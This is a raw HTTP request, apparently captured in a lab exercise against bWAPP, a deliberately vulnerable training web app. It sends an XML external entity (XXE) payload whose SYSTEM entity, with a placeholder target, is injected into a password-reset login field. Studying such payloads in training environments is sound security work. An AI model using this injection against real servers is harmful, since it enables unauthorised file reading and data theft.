POST /bWAPP/xxe-2.php HTTP/1.1
Host: 192.168.198.128
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=UTF-8
Referer: http://192.168.198.128/bWAPP/xxe-1.php
Content-Length: 155
Cookie: security_level=0; PHPSESSID=3a5450e545b3a2286561f91ba2078eac
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE r [ <!ENTITY file SYSTEM "[PLACEHOLDER]">]>
<reset><login>&file;</login><secret>Any bugs?</secret></reset>
